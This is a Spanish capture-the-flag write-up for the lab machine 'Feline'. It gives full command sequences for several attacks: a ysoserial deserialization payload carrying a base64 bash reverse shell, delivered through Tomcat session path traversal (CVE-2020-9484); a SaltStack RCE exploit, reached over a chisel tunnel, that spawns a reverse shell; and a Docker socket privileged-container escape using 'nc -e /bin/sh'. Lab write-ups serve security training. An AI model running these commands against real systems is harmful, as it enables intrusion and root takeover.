# Feline

**OS**: Linux \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- File upload serialización
- Apache Tomcat deserialization (CVE-2020-9484)
- Ysoserial
- SaltStack (CVE-2020-11651,CVE-2020-11652)
- Port Forwarding (chisel)
- Docker.Sock Privilege Escalation

## Nmap Scan

`nmap -Pn -sV -sC -p- 10.10.10.205`

```
Nmap scan report for 10.10.10.205
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache Tomcat 9.0.27
|_http-title: VirusBucket
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Enumerando el puerto **8080** nos encontramos con una función para subir archivos y al parecer los analiza.

`http://10.10.10.205:8080/service/`

![1](img/1.png)

Al subir cualquier archivo interceptamos la petición y podemos ver que nos regresa el mensaje **File uploaded successfully**.

![2](img/2.png)

Sin embargo si dejamos el parámetro **filename** vacío obtenemos mensajes de errores que muestran la ruta donde se suben los archivos (**/opt/samples/uploads**) y el servidor web es una **apache tomcat**.

![3](img/3.png)

### Apache Tomcat deserialization (CVE-2020-9484)

Investigando sobre los errores que arroja la aplicación encontramos que es una vulnerabilidad de serialización sobre apache tomcat en el parámetro **JSESSIONID**. El siguiente [articulo](https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/) explica los detalles del ataque.

Utilizaremos **ysoserial** para crear nuestro payload. Después de probar diferentes formas de crear nuestro payload lo siguiente funciono correctamente. 

Creamos nuestra reverse shell y hacemos encode en base64.

`echo 'bash -i >& /dev/tcp/10.10.15.20/1234 0>&1' | base64`

Utilizamos ysoserial para crear nuestro payload serializado.

`java -jar ysoserial.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4yMC8xMjM0IDA+JjEK}|{base64,-d}|{bash,-i}" > doom.session`

Mandamos la primera petición para subir el payload al sistema.

`curl 'http://10.10.10.205:8080/upload.jsp' -F 'image=@doom.session' > /dev/null`

Mandamos la segunda petición para ejecutar nuestro payload.

`curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../opt/samples/uploads/doom' > /dev/null`

![4](img/4.png)

Obtenemos nuestra reverse shell como el usuario tomcat.

`nc -lvnp 1234`

![5](img/5.png)

## Escalada de Privilegios (User)

Enumerando la máquina encontramos 2 puertos locales abiertos que parecen interesantes **4505** y **4506**.

![6](img/6.png)

Investigando sobre los puertos el servicio que está corriendo se llama **SaltStack** que tiene una vulnerabilidad de **Remote Code Execution (RCE)**.

### SaltStack CVE-2020-11651,CVE-2020-11652

> Salt es un software de manejo de la configuración y ejecución remota basado en Python, que nos permitirá manejar nuestra infraestructura de manera rápida y eficiente, optimizando al máximo el tiempo disponible de los administradores de sistemas y redes.

Es necesario hacer un portforwarding para acceder desde nuestra máquina al servicio y ejecutar el exploit por lo cual subiremos **chisel** para hacer la redirección de puertos.

- `sudo python3 -m http.server 80`
- `wget http://10.10.15.20/chisel`
- `chmod +x chisel`

![7](img/7.png)

Creamos el túnel con chisel.

- `./chisel server -p 5555 --reverse`
- `./chisel client 10.10.15.20:5555 R:4506:127.0.0.1:4506`

![8](img/8.png)

Utilizando este [exploit]((https://github.com/jasperla/CVE-2020-11651-poc)) podemos obtener una reverse shell.

- `nc -lvnp 4444`
- `python3 saltstack.py --master 127.0.0.1 --exec 'bash -c "bash -i >& /dev/tcp/10.10.15.20/4444 0>&1"'`

![9](img/9.png)

## Escalada de Privilegios (Root)

Leyendo los archivos en **/root** en el **.bash_history** podemos visualizar un comando que hace una petición a localhost a través de un **docker.socks**.

`cat .bash_history`

![10](img/10.png)

Al ejecutar el comando nos trae información sobre la imagen del contenedor con nombre **sandbox**.

`curl -s --unix-socket /var/run/docker.sock http://localhost/images/json`

![11](img/11.png)

### Docker.Sock Privilege Escalation

> docker.sock es el socket UNIX que escucha el demonio de Docker. Es el principal punto de entrada para la API de Docker. También puede ser un socket TCP, pero de forma predeterminada, por razones de seguridad, Docker utiliza un socket UNIX de forma predeterminada.

Investigando que es docker.sock encontramos un [articulo](https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/) que nos muestra como tomar ventaja de eso.

Con base al anterior articulo procedemos a crear nuestro contenedor.

```
curl -i -s --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" http://localhost/containers/create -d '{"Image":"sandbox", "Cmd":["/usr/bin/nc", "10.10.15.20", "6666", "-e", "/bin/sh"], "Binds": [ "/:/mnt" ], "Privileged": true}'
```

![12](img/12.png)

Ponemos a la escucha nuestro netcat y ejecutamos el siguiente comando para obtener nuestra reverse shell.

```
curl -i -s --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" http://localhost/containers/55dff022f842762cc5c918436ee02eed420ba5dffd51fe3e3d8af5ef2e025605/start
```

![13](img/13.png)

Obtenemos una shell como root y podemos acceder a los archivos en la ruta **mnt**.

- `nc -lvnp 6666`
- `cat /mnt/root/root.txt`

![14](img/14.png)

## Referencias
https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/ \
https://github.com/masahiro331/CVE-2020-9484 \
https://github.com/frohoff/ysoserial \
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/coinminers-exploit-saltstack-vulnerabilities-cve-2020-11651-and-cve-2020-11652 \
https://github.com/jasperla/CVE-2020-11651-poc \
https://www.exploit-db.com/exploits/48421 \
https://github.com/jpillora/chisel \
https://dejandayoff.com/the-danger-of-exposing-docker.sock/ \
https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/